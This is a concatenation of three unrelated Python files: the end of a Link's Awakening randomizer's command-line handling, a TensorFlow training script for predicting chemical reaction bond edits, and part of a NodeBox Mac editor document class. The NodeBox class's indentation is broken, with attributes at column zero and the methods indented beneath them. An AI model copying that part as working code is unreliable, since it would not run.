    parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
        help="Generates multiple roms for a multiworld setup.")
    parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
        help="Set configuration for a multiworld player, supply multiple times for settings per player")
    parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
        help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
    parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
        help="Enables randomization of heart pieces.")
    parser.add_argument('--seashells', dest="seashells", action="store_true",
        help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
    parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
        help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
    parser.add_argument('--instruments', dest="instruments", action="store_true",
        help="Shuffle the instruments in the item pool.")
    parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
        help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
    parser.add_argument('--dungeon-items', dest="dungeon_items", choices=['standard', 'localkeys', 'localnightmarekey', 'keysanity', 'keysy'], default='standard',
        help="Sets what gets done with dungeon items, if they are in their own dungeon or not.")
    parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
        help="Place your starting house at a random location.")
    parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
        help="Enable dungeon shuffle, puts dungeons on different spots.")
    parser.add_argument('--entranceshuffle', dest="entranceshuffle", choices=["none", "simple", "advanced", "expert", "insanity"], default="none",
        help="Enable entrance shuffle, shuffles around overworld entrances.")
    parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
        help="Enable boss shuffle, swaps around dungeon bosses.")
    parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
        help="Shuffle the minibosses or just randomize them.")
    parser.add_argument('--doubletrouble', dest="doubletrouble", action="store_true",
        help="...")
    parser.add_argument('--witch', dest="witch", action="store_true",
        help="Enables witch and toadstool in the item pool.")
    parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1'], default='default',
        help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
    parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
        help="Put the boomerang and the trade with the boomerang in the item pool")
    parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
        help="Configure when to allow stealing from the shop.")
    parser.add_argument('--hard-mode', dest="hardMode", action="store_true",
        help="Make the game a bit harder, less health from drops, bombs damage yourself, and less iframes.")
    parser.add_argument('--goal', dest="goal", type=goal, default='8',
        help="Configure the instrument goal for this rom: any number between -1 (open egg) and 8, a range (e.g. 4-7), 'random', or 'raft' / 'seashells' for special goals.")
    parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
        help="Switches between making sure all locations are reachable or only the goal is reachable")
    parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
        help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
    parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
        help="Sets up different item pools, for easier or harder gameplay.")
    parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal',
        help="Allows switching to the dungeondive overworld, where there are only dungeons.")
    parser.add_argument('--pymod', dest="pymod", action='append',
        help="Load python code mods.")
    # Just aestetic flags
    parser.add_argument('--gfxmod', dest="gfxmod", action='append',
        help="Load graphical mods.")
    parser.add_argument('--remove-flashing-lights', dest="removeFlashingLights", action="store_true",
        help="Remove the flashing light effects from mamu, the shopkeeper and madbatter.")
    parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
        help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
    parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
        help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
    parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
        help="Enable the nag messages on touching stones and crystals. By default they are removed.")
    parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
        help="Slows or disables the low health beeping sound")
    parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
        help="Force the palette of link")
    parser.add_argument('--music', dest="music", choices=['default', 'random', 'off'], default='default',
        help="Randomizes or disable the music")
    args = parser.parse_args(mainargs)

    if args.multiworld is not None:
        # Every player starts with a copy of the shared settings; per-player
        # overrides come from repeated --multiworld-config strings.
        args.multiworld_options = [args] * args.multiworld
        if args.multiworld_config is not None:
            for index, settings_string in enumerate(args.multiworld_config):
                args.multiworld_options[index] = parser.parse_args(
                    [args.input_filename] + shlex.split(settings_string),
                    namespace=argparse.Namespace(**vars(args)))

    if args.timeout is not None:
        # Watchdog: hard-kill the process if generation takes too long.
        import threading
        import time
        import os

        def timeoutFunction():
            time.sleep(args.timeout)
            print("TIMEOUT")
            sys.stdout.flush()
            os._exit(1)
        threading.Thread(target=timeoutFunction, daemon=True).start()

    if args.exportmap:
        import mapexport
        print("Loading: %s" % (args.input_filename))
        rom = ROMWithTables(args.input_filename)
        mapexport.MapExport(rom)
        sys.exit(0)

    if args.emptyplan:
        # Write a skeleton plandomizer file listing all known items and every
        # location that has more than one possible option.
        import locations.items
        f = open(args.emptyplan, "wt")
        f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
        f.write(";Modify the item pool:\n")
        f.write(";Pool:SWORD:+5\n")
        f.write(";Pool:RUPEES_50:-5\n")
        import worldSetup
        iteminfo_list = logic.Logic(args, world_setup=worldSetup.WorldSetup()).iteminfo_list
        for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
            if len(ii.OPTIONS) > 1:
                f.write(";%r\n" % (ii.metadata))
                f.write("Location:%s: \n" % (ii.nameId))
        sys.exit(0)

    if args.dump is not None or args.test:
        print("Loading: %s" % (args.input_filename))
        # Bug fix: with --test but no --dump, args.dump is None and the old
        # expression "[args.input_filename] + args.dump" raised a TypeError.
        roms = [ROMWithTables(f) for f in [args.input_filename] + (args.dump or [])]
        if args.spoilerformat == "none":
            args.spoilerformat = "console"
        try:
            log = spoilerLog.SpoilerLog(args, roms)
            log.output(args.spoiler_filename)
            sys.exit(0)
        except spoilerLog.RaceRomException:
            print("Cannot read spoiler log for race rom")
            sys.exit(1)

    if args.seed:
        # Seeds may be given as hex; anything that fails to unhexlify is
        # treated as a literal ascii string.
        try:
            args.seed = binascii.unhexlify(args.seed)
        except binascii.Error:
            args.seed = args.seed.encode("ascii")

    retry_count = 0
    while True:
        try:
            r = randomizer.Randomizer(args, seed=args.seed)
            seed = binascii.hexlify(r.seed).decode("ascii").upper()
            break
        except randomizer.Error:
            # A user-specified seed either works or it doesn't; only random
            # seeds are retried (up to 100 times).
            if args.seed is not None:
                print("Specified seed does not produce a valid result.")
                sys.exit(1)
            retry_count += 1
            if retry_count > 100:
                print("Randomization keeps failing, abort!")
                sys.exit(1)
            print("Failed, trying again: %d" % (retry_count))
    print("Seed: %s" % (seed))
# Script entry point: run the randomizer CLI when executed directly.
if __name__ == "__main__":
    main()
|
nntrain.py | import tensorflow as tf
from utils.nn import linearND, linear
from mol_graph import atom_fdim as adim, bond_fdim as bdim, max_nb, smiles2graph_list as _s2g
from models import *
from ioutils import *
import math, sys, random
from collections import Counter
from optparse import OptionParser
from functools import partial
import threading
from multiprocessing import Queue
import pickle
# Top-k sizes used for accuracy reporting (Acc@20 and Acc@10).
NK = 20
NK0 = 10

# Command-line hyperparameters for training.
parser = OptionParser()
parser.add_option("-t", "--data", dest="data_path")
parser.add_option("-m", "--save_dir", dest="save_path")
parser.add_option("-b", "--batch", dest="batch_size", default=20)
parser.add_option("-w", "--hidden", dest="hidden_size", default=100)
parser.add_option("-d", "--depth", dest="depth", default=1)
parser.add_option("-l", "--max_norm", dest="max_norm", default=5.0)
opts,args = parser.parse_args()

batch_size = int(opts.batch_size)
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
max_norm = float(opts.max_norm)

# Index atoms by their RDKit atom-map number (1-based -> 0-based).
smiles2graph_batch = partial(_s2g, idxfunc=lambda x:x.GetIntProp('molAtomMapNumber') - 1)
session = tf.Session()

# Placeholders used by the producer thread to enqueue training examples.
_input_atom = tf.placeholder(tf.float32, [batch_size, None, adim])
_input_bond = tf.placeholder(tf.float32, [batch_size, None, bdim])
_atom_graph = tf.placeholder(tf.int32, [batch_size, None, max_nb, 2])
_bond_graph = tf.placeholder(tf.int32, [batch_size, None, max_nb, 2])
_num_nbs = tf.placeholder(tf.int32, [batch_size, None])
_node_mask = tf.placeholder(tf.float32, [batch_size, None])
_src_holder = [_input_atom, _input_bond, _atom_graph, _bond_graph, _num_nbs, _node_mask]
_label = tf.placeholder(tf.int32, [batch_size, None])
_binary = tf.placeholder(tf.float32, [batch_size, None, None, binary_fdim])
#keep_prob = tf.placeholder(tf.float32)

# FIFO queue decouples batch preparation (Python thread) from training.
q = tf.FIFOQueue(100, [tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.float32, tf.int32, tf.float32])
enqueue = q.enqueue(_src_holder + [_label, _binary])
input_atom, input_bond, atom_graph, bond_graph, num_nbs, node_mask, label, binary = q.dequeue()

# dequeue() loses static shape information; restore it for the model.
input_atom.set_shape([batch_size, None, adim])
input_bond.set_shape([batch_size, None, bdim])
atom_graph.set_shape([batch_size, None, max_nb, 2])
bond_graph.set_shape([batch_size, None, max_nb, 2])
num_nbs.set_shape([batch_size, None])
node_mask.set_shape([batch_size, None])
label.set_shape([batch_size, None])
binary.set_shape([batch_size, None, None, binary_fdim])

node_mask = tf.expand_dims(node_mask, -1)
flat_label = tf.reshape(label, [-1])
# Padding entries carry the INVALID_BOND label; mask them out of the loss.
bond_mask = tf.to_float(tf.not_equal(flat_label, INVALID_BOND))
flat_label = tf.maximum(0, flat_label)
graph_inputs = (input_atom, input_bond, atom_graph, bond_graph, num_nbs, node_mask)
with tf.variable_scope("encoder"):
    # Graph convolution producing per-atom embeddings.
    atom_hiddens, _ = rcnn_wl_last(graph_inputs, batch_size=batch_size, hidden_size=hidden_size, depth=depth)

# Pairwise atom features: broadcast-sum of the two atoms' embeddings.
atom_hiddens1 = tf.reshape(atom_hiddens, [batch_size, 1, -1, hidden_size])
atom_hiddens2 = tf.reshape(atom_hiddens, [batch_size, -1, 1, hidden_size])
atom_pair = atom_hiddens1 + atom_hiddens2
# Attention over atom pairs, gated by sigmoid scores, yields a per-atom
# global context vector.
att_hidden = tf.nn.relu(linearND(atom_pair, hidden_size, scope="att_atom_feature", init_bias=None) + linearND(binary, hidden_size, scope="att_bin_feature"))
att_score = linearND(att_hidden, 1, scope="att_scores")
att_score = tf.nn.sigmoid(att_score)
att_context = att_score * atom_hiddens1
att_context = tf.reduce_sum(att_context, 2)
att_context1 = tf.reshape(att_context, [batch_size, 1, -1, hidden_size])
att_context2 = tf.reshape(att_context, [batch_size, -1, 1, hidden_size])
att_pair = att_context1 + att_context2
# Final pair score combines local pair, binary bond, and attention-context features.
pair_hidden = linearND(atom_pair, hidden_size, scope="atom_feature", init_bias=None) + linearND(binary, hidden_size, scope="bin_feature", init_bias=None) + linearND(att_pair, hidden_size, scope="ctx_feature")
pair_hidden = tf.nn.relu(pair_hidden)
pair_hidden = tf.reshape(pair_hidden, [batch_size, -1, hidden_size])
score = linearND(pair_hidden, 1, scope="scores")
score = tf.squeeze(score, [2])
# Push invalid (padding) pairs far below everything else before top-k.
bmask = tf.to_float(tf.equal(label, INVALID_BOND)) * 10000
_, topk = tf.nn.top_k(score - bmask, k=NK)
flat_score = tf.reshape(score, [-1])
loss = tf.nn.sigmoid_cross_entropy_with_logits(flat_score, tf.to_float(flat_label))
loss = tf.reduce_sum(loss * bond_mask)
# Adam with a feedable learning rate and global-norm gradient clipping.
_lr = tf.placeholder(tf.float32, [])
optimizer = tf.train.AdamOptimizer(learning_rate=_lr)
param_norm = tf.global_norm(tf.trainable_variables())
grads_and_vars = optimizer.compute_gradients(loss / batch_size) #+ beta * param_norm)
grads, var = zip(*grads_and_vars)
grad_norm = tf.global_norm(grads)
new_grads, _ = tf.clip_by_global_norm(grads, max_norm)
grads_and_vars = zip(new_grads, var)
backprop = optimizer.apply_gradients(grads_and_vars)

tf.global_variables_initializer().run(session=session)
# Report trainable parameter count (in thousands).
size_func = lambda v: reduce(lambda x, y: x*y, v.get_shape().as_list())
n = sum(size_func(v) for v in tf.trainable_variables())
print "Model size: %dK" % (n/1000,)
# Python-side queue carries the sparse labels matching each enqueued TF batch.
queue = Queue()
data = []
# Each data-file line: "reaction split edits"; keep only the training split.
with open(opts.data_path) as f:
    for line in f:
        items = line.split()
        if items[1] != 'train': continue
        react = items[0].split('>')[0]
        edits = items[2]
        data.append((react, edits))
print "Training set size:", len(data)
def read_data(train, coord):
    """Producer-thread body: cycle through `train` forever, convert each
    batch of reactions to graph tensors, enqueue it on the TF queue, and
    push the matching sparse labels on the Python-side `queue`.

    train -- list of (reactant_smiles, edits) pairs
    coord -- tf.train.Coordinator used for shutdown signalling
    """
    it = 0
    train_len = len(train)
    while True:
        src_batch, edit_batch = [], []
        for i in xrange(batch_size):
            # Fix: read from the `train` argument instead of the module-level
            # `data` global (identical at the current call site, but the
            # parameter was silently ignored before).
            react, edits = train[it]
            src_batch.append(react)
            edit_batch.append(edits)
            it = (it + 1) % train_len
        src_tuple = smiles2graph_batch(src_batch)
        cur_bin, cur_label, sp_label = get_all_batch(zip(src_batch, edit_batch))
        feed_map = {x:y for x,y in zip(_src_holder, src_tuple)}
        feed_map.update({_label:cur_label, _binary:cur_bin})
        session.run(enqueue, feed_dict=feed_map)
        queue.put(sp_label)
    coord.request_stop()  # NOTE: unreachable — the loop above never breaks
# Start the feeding thread, then train, reporting top-k accuracies.
coord = tf.train.Coordinator()
t = threading.Thread(target=read_data, args=(data, coord))
t.start()

saver = tf.train.Saver()
it, sum_acc, sum_err, sum_gnorm = 0, 0.0, 0.0, 0.0
lr = 0.001
try:
    while not coord.should_stop():
        it += 1
        _, cur_topk, pnorm, gnorm = session.run([backprop, topk, param_norm, grad_norm], feed_dict={_lr:lr})
        sp_label = queue.get()
        # A sample counts as correct when ALL of its true bond changes
        # appear in the top-NK (sum_err -> Acc@20) / top-NK0 (sum_acc -> Acc@10).
        for i in xrange(batch_size):
            pre = 0
            for j in xrange(NK):
                if cur_topk[i,j] in sp_label[i]:
                    pre += 1
            if len(sp_label[i]) == pre: sum_err += 1
            pre = 0
            for j in xrange(NK0):
                if cur_topk[i,j] in sp_label[i]:
                    pre += 1
            if len(sp_label[i]) == pre: sum_acc += 1
        sum_gnorm += gnorm
        if it % 50 == 0:
            print "Acc@10: %.4f, Acc@20: %.4f, Param Norm: %.2f, Grad Norm: %.2f" % (sum_acc / (50 * batch_size), sum_err / (50 * batch_size), pnorm, sum_gnorm / 50)
            sys.stdout.flush()
            sum_acc, sum_err, sum_gnorm = 0.0, 0.0, 0.0
        if it % 10000 == 0:
            # Decay learning rate, checkpoint, and stop after 10000 iterations.
            lr *= 0.9
            saver.save(session, opts.save_path + "/model.ckpt", global_step=it)
            #print "Model Saved!"
            break
except Exception as e:
    print e
    coord.request_stop(e)
finally:
    saver.save(session, opts.save_path + "/model.final")
    coord.request_stop()
    coord.join([t])
|
__init__.py | import sys
import os
import traceback, linecache
import re
import objc
import time
import random
import EasyDialogs
from PyObjCTools import NibClassBuilder, AppHelper
from Foundation import *
from AppKit import *
from threading import Thread
from nodebox.gui.mac.ValueLadder import MAGICVAR
from nodebox.gui.mac import PyDETextView
from nodebox.gui.mac.util import errorAlert
from nodebox import util
from nodebox.util import QTSupport
from nodebox import graphics
# AppleScript enumerator codes for PDF and Quicktime export
PDF = 0x70646678 # 'pdfx'
QUICKTIME = 0x71747878 # 'qt '

# Near-white gray (5% black blended into white), used for UI chrome.
VERY_LIGHT_GRAY = NSColor.blackColor().blendedColorWithFraction_ofColor_(
    0.95, NSColor.whiteColor())

# Register the classes defined in the nib files before they are referenced.
NibClassBuilder.extractClasses("MainMenu")
NibClassBuilder.extractClasses("NodeBoxDocument")
NibClassBuilder.extractClasses("ExportImageAccessory")
NibClassBuilder.extractClasses("ExportMovieAccessory")
NibClassBuilder.extractClasses("ProgressBarSheet")
from nodebox.gui.mac.dashboard import *
from nodebox.gui.mac.progressbar import ProgressBarController
class ExportCommand(NSScriptCommand):
    # AppleScript "export" command; presumably dispatched to the document's
    # handleExportScriptCommand_ — no extra behavior needed here.
    pass
class OutputFile(object):
    """File-like sink that records writes into a shared list.

    Each write is appended to `data` as an (isErr, text) pair so stdout and
    stderr can be interleaved and later rendered with different styling.
    """

    def __init__(self, data, isErr=False):
        self.data = data
        self.isErr = isErr

    def write(self, data):
        # Non-string payloads are recorded untouched.
        if not isinstance(data, str):
            self.data.append((self.isErr, data))
            return
        # Byte strings are decoded to unicode; undecodable input is kept
        # as a marked repr instead of raising.
        try:
            decoded = unicode(data, "utf_8", "replace")
        except UnicodeDecodeError:
            decoded = "XXX " + repr(data)
        self.data.append((self.isErr, decoded))
# class defined in NodeBoxDocument.nib
class NodeBoxDocument(NibClassBuilder.AutoBaseClass):
# the actual base class is NSDocument
# The following outlets are added to the class:
# graphicsView
# outputView
# textView
# variablesController
# dashboardController
# The ExportImageAccessory adds:
# exportImageAccessory
# exportImageFormat
# exportImagePageCount
# The ExportMovieAccessory adds:
# exportMovieAccessory
# exportMovieFrame
# exportMovieFps
# When the PageCount accessory is loaded, we also add:
# pageCount
# pageCountAccessory
# When the ExportSheet is loaded, we also add:
# exportSheet
# exportSheetIndicator
path = None
exportDir = None
magicvar = None # Used for value ladders.
_code = None
vars = []
movie = None
    def windowNibName(self):
        # Nib file that defines this document's window layout.
        return "NodeBoxDocument"

    def init(self):
        # NSDocument initializer; PyObjC convention returns (a possibly new) self.
        self = super(NodeBoxDocument, self).init()
        nc = NSNotificationCenter.defaultCenter()
        nc.addObserver_selector_name_object_(self, "textFontChanged:", "PyDETextFontChanged", None)
        self.namespace = {}
        self.canvas = graphics.Canvas()
        self.context = graphics.Context(self.canvas, self.namespace)
        self.animationTimer = None
        self.__doc__ = {}
        self._pageNumber = 1
        self._frame = 150
        self.fullScreen = None
        self._seed = time.time()
        self.currentView = self.graphicsView
        return self

    def close(self):
        # Stop any running script/animation before the document goes away.
        self.stopScript_()
        super(NodeBoxDocument, self).close()

    def __del__(self):
        nc = NSNotificationCenter.defaultCenter()
        nc.removeObserver_name_object_(self, "PyDETextFontChanged", None)
        # text view has a couple of circular refs, it can let go of them now
        self.textView._cleanup()

    def textFontChanged_(self, notification):
        # Keep the output view's font in sync with the editor font.
        font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
        self.outputView.setFont_(font)

    def readFromFile_ofType_(self, path, tp):
        if self.textView is None:
            # we're not yet fully loaded
            self.path = path
        else:
            # "revert"
            self.readFromUTF8(path)
        return True

    def writeToFile_ofType_(self, path, tp):
        # Save the editor contents to disk as UTF-8 text.
        f = file(path, "w")
        text = self.textView.string()
        f.write(text.encode("utf8"))
        f.close()
        return True

    def windowControllerDidLoadNib_(self, controller):
        # Window finished loading: populate the editor, set fonts and focus.
        if self.path:
            self.readFromUTF8(self.path)
        font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
        self.outputView.setFont_(font)
        self.textView.window().makeFirstResponder_(self.textView)
        self.windowControllers()[0].setWindowFrameAutosaveName_("NodeBoxDocumentWindow")

    def readFromUTF8(self, path):
        # Load a UTF-8 file into the editor; detect tab-based indentation.
        f = file(path)
        text = unicode(f.read(), "utf_8")
        f.close()
        self.textView.setString_(text)
        self.textView.usesTabs = "\t" in text
    def cleanRun(self, fn, newSeed = True):
        """Full script run: compile, reset state, execute, rebuild the var UI."""
        # Prepare everything for running the script
        self.prepareRun()
        # Run the actual script
        if self.fastRun(fn, newSeed):
            # Build the interface
            self.vars = self.namespace["_ctx"]._vars
            if len(self.vars) > 0:
                self.buildInterface_()
            return True
        return False

    def prepareRun(self):
        """Compile the script and reset namespace/page/frame state.

        NOTE(review): returns False on compile failure but None on success,
        and cleanRun() ignores the result — confirm before relying on it.
        """
        # Compile the script
        success, output = self._boxedRun(self._compileScript)
        self._flushOutput(output)
        if not success:
            return False
        # Initialize the namespace
        self._initNamespace()
        # Reset the pagenum
        # NOTE(review): sets _pageNum, but the rest of the class reads
        # _pageNumber — this looks like a dead assignment; confirm.
        self._pageNum = 1
        # Reset the frame
        self._frame = 1
        self.speed = self.canvas.speed = None

    def fastRun(self, fn, newSeed = False):
        """Run fn against the already-compiled code; no recompile/UI rebuild."""
        # Check if there is code to run
        if self._code is None:
            return False
        # Clear the canvas
        self.canvas.clear()
        # Generate a new seed, if needed
        if newSeed:
            self._seed = time.time()
        random.seed(self._seed)
        # Set the mouse position
        window = self.currentView.window()
        pt = window.mouseLocationOutsideOfEventStream()
        mx, my = window.contentView().convertPoint_toView_(pt, self.currentView)
        # Hack: mouse coordinates are flipped vertically in FullscreenView.
        # This flips them back.
        if isinstance(self.currentView, FullscreenView):
            my = self.currentView.bounds()[1][1] - my
        self.namespace["MOUSEX"], self.namespace["MOUSEY"] = mx, my
        self.namespace["mousedown"] = self.currentView.mousedown
        self.namespace["keydown"] = self.currentView.keydown
        self.namespace["key"] = self.currentView.key
        self.namespace["keycode"] = self.currentView.keycode
        self.namespace["scrollwheel"] = self.currentView.scrollwheel
        self.namespace["wheeldelta"] = self.currentView.wheeldelta
        # Reset the context
        self.context._resetContext()
        # Initalize the magicvar
        self.namespace[MAGICVAR] = self.magicvar
        # Set the pagenum
        self.namespace['PAGENUM'] = self._pageNumber
        # Set the frame
        self.namespace['FRAME'] = self._frame
        # Run the script
        success, output = self._boxedRun(fn)
        self._flushOutput(output)
        if not success:
            return False
        # Display the output of the script
        self.currentView.setCanvas(self.canvas)
        return True
    def handleRunScriptCommand_(self, command):
        # AppleScript "run script" command handler.
        self.runScript_(self)

    def runFullscreen_(self):
        # Run the script in a dedicated fullscreen window.
        if self.fullScreen is not None: return
        self.stopScript_()
        self.currentView = FullscreenView.alloc().init()
        self.currentView.canvas = None
        fullRect = NSScreen.mainScreen().frame()
        self.fullScreen = FullscreenWindow.alloc().init(fullRect)
        self.fullScreen.setContentView_(self.currentView)
        self.fullScreen.makeKeyAndOrderFront_(self)
        self.fullScreen.makeFirstResponder_(self.currentView)
        NSMenu.setMenuBarVisible_(False)
        NSCursor.hide()
        self._runScript()

    def runScript_(self, compile=True, newSeed=True):
        # Run in the normal (windowed) graphics view.
        if self.fullScreen is not None: return
        self.currentView = self.graphicsView
        self._runScript(compile, newSeed)

    def _runScript(self, compile=True, newSeed=True):
        if not self.cleanRun(self._execScript):
            pass
        # Check whether we are dealing with animation
        if self.canvas.speed is not None:
            if not self.namespace.has_key("draw"):
                errorAlert("Not a proper NodeBox animation",
                    "NodeBox animations should have at least a draw() method.")
                return
            # Check if animationTimer is already running
            if self.animationTimer is not None:
                self.stopScript_()
            self.speed = self.canvas.speed
            # Run setup routine
            if self.namespace.has_key("setup"):
                self.fastRun(self.namespace["setup"])
            window = self.currentView.window()
            window.makeFirstResponder_(self.currentView)
            # Start the timer
            self.animationTimer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(
                1.0 / self.speed, self, objc.selector(self.doFrame_, signature="v@:@"), None, True)

    def runScriptFast_(self):
        if self.animationTimer is None:
            self.fastRun(self._execScript)
        else:
            # XXX: This can be sped up. We just run _execScript to get the
            # method with __MAGICVAR__ into the namespace, and execute
            # that, so it should only be called once for animations.
            self.fastRun(self._execScript)
            self.fastRun(self.namespace["draw"])

    def doFrame_(self):
        # Animation timer callback: draw one frame, then advance the counter.
        self.fastRun(self.namespace["draw"], newSeed=True)
        self._frame += 1

    def source(self):
        # Current script text.
        return self.textView.string()

    def setSource_(self, source):
        self.textView.setString_(source)

    def stopScript_(self):
        # Tear down animation/fullscreen state and return focus to the editor.
        if self.animationTimer is not None:
            self.animationTimer.invalidate()
            self.animationTimer = None
        if self.fullScreen is not None:
            self.currentView = self.graphicsView
            self.fullScreen = None
            NSMenu.setMenuBarVisible_(True)
            NSCursor.unhide()
        self.textView.hideValueLadder()
        window = self.textView.window()
        window.makeFirstResponder_(self.textView)
    def _compileScript(self, source=None):
        # Compile the editor text (or the given source) into self._code.
        if source is None:
            source = self.textView.string()
        #linecache.clearcache()
        #linecache.cache[fileName] = len(source), 0, source.splitlines(True), fileName
        self._code = None
        self._code = compile(source + "\n\n", self.scriptName, "exec")

    def _initNamespace(self):
        # Rebuild the script's global namespace from scratch.
        self.namespace.clear()
        # Add everything from the namespace
        for name in graphics.__all__:
            self.namespace[name] = getattr(graphics, name)
        for name in util.__all__:
            self.namespace[name] = getattr(util, name)
        # Add everything from the context object
        self.namespace["_ctx"] = self.context
        for attrName in dir(self.context):
            self.namespace[attrName] = getattr(self.context, attrName)
        # Add the document global
        self.namespace["__doc__"] = self.__doc__
        # Add the page number
        self.namespace["PAGENUM"] = self._pageNumber
        # Add the frame number
        self.namespace["FRAME"] = self._frame
        # Add the magic var
        self.namespace[MAGICVAR] = self.magicvar
        # XXX: will be empty after reset.
        #for var in self.vars:
        #    self.namespace[var.name] = var.value

    def _execScript(self):
        # Python 2 exec statement: run the compiled script in the namespace.
        exec self._code in self.namespace
        self.__doc__ = self.namespace.get("__doc__", self.__doc__)
    def _boxedRun(self, method, args=[]):
        """
        Runs the given method in a boxed environment.
        Boxed environments:
         - Have their current directory set to the directory of the file
         - Have their argument set to the filename
         - Have their outputs redirect to an output stream.
        Returns:
           A tuple containing:
             - A boolean indicating whether the run was successful
             - The OutputFile
        """
        self.scriptName = self.fileName()
        libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
        if not self.scriptName:
            curDir = os.getenv("HOME")
            self.scriptName = "<untitled>"
        else:
            curDir = os.path.dirname(self.scriptName)
        # Save interpreter state so it can be restored in the finally block.
        save = sys.stdout, sys.stderr
        saveDir = os.getcwd()
        saveArgv = sys.argv
        sys.argv = [self.scriptName]
        if os.path.exists(libDir):
            sys.path.insert(0, libDir)
        os.chdir(curDir)
        sys.path.insert(0, curDir)
        # Capture stdout/stderr into a shared (isErr, text) list.
        output = []
        sys.stdout = OutputFile(output, False)
        sys.stderr = OutputFile(output, True)
        self._scriptDone = False
        try:
            if self.animationTimer is None:
                # Creating a thread is a heavy operation,
                # don't install it when animating, where speed is crucial
                t = Thread(target=self._userCancelledMonitor, name="UserCancelledMonitor")
                t.start()
            try:
                method(*args)
            except KeyboardInterrupt:
                self.stopScript_()
            except:
                # Show the user's traceback, hiding our own exec frame.
                etype, value, tb = sys.exc_info()
                if tb.tb_next is not None:
                    tb = tb.tb_next # skip the frame doing the exec
                traceback.print_exception(etype, value, tb)
                etype = value = tb = None
                return False, output
        finally:
            self._scriptDone = True
            sys.stdout, sys.stderr = save
            os.chdir(saveDir)
            sys.path.remove(curDir)
            try:
                sys.path.remove(libDir)
            except ValueError:
                pass
            sys.argv = saveArgv
            #self._flushOutput()
        return True, output
    # from Mac/Tools/IDE/PyEdit.py
    def _userCancelledMonitor(self):
        # Watchdog thread: raise SIGINT in the process when the user cancels
        # (cmd-period) while a script is running.
        import time
        from signal import SIGINT
        from Carbon import Evt
        while not self._scriptDone:
            if Evt.CheckEventQueueForUserCancel():
                # Send a SIGINT signal to ourselves.
                # This gets delivered to the main thread,
                # cancelling the running script.
                os.kill(os.getpid(), SIGINT)
                break
            time.sleep(0.25)

    def _flushOutput(self, output):
        # Append captured (isErr, text) pairs to the output view, switching
        # typing attributes only when the stream kind changes.
        outAttrs = PyDETextView.getBasicTextAttributes()
        errAttrs = outAttrs.copy()
        # XXX err color from user defaults...
        errAttrs[NSForegroundColorAttributeName] = NSColor.redColor()
        outputView = self.outputView
        outputView.setSelectedRange_((outputView.textStorage().length(), 0))
        lastErr = None
        for isErr, data in output:
            if isErr != lastErr:
                attrs = [outAttrs, errAttrs][isErr]
                outputView.setTypingAttributes_(attrs)
                lastErr = isErr
            outputView.insertText_(data)
        # del self.output
    def copyImageAsPDF_(self, sender):
        pboard = NSPasteboard.generalPasteboard()
        # graphicsView implements the pboard delegate method to provide the data
        pboard.declareTypes_owner_([NSPDFPboardType,NSPostScriptPboardType,NSTIFFPboardType], self.graphicsView)

    def exportAsImage_(self, sender):
        # Show the export save panel with the image accessory view attached.
        exportPanel = NSSavePanel.savePanel()
        exportPanel.setRequiredFileType_("pdf")
        exportPanel.setNameFieldLabel_("Export To:")
        exportPanel.setPrompt_("Export")
        exportPanel.setCanSelectHiddenExtension_(True)
        if not NSBundle.loadNibNamed_owner_("ExportImageAccessory", self):
            NSLog("Error -- could not load ExportImageAccessory.")
        self.exportImagePageCount.setIntValue_(1)
        exportPanel.setAccessoryView_(self.exportImageAccessory)
        path = self.fileName()
        if path:
            dirName, fileName = os.path.split(path)
            fileName, ext = os.path.splitext(fileName)
            fileName += ".pdf"
        else:
            dirName, fileName = None, "Untitled.pdf"
        # If a file was already exported, use that folder as the default.
        if self.exportDir is not None:
            dirName = self.exportDir
        exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
            dirName, fileName, NSApp().mainWindow(), self,
            "exportPanelDidEnd:returnCode:contextInfo:", 0)

    def exportPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
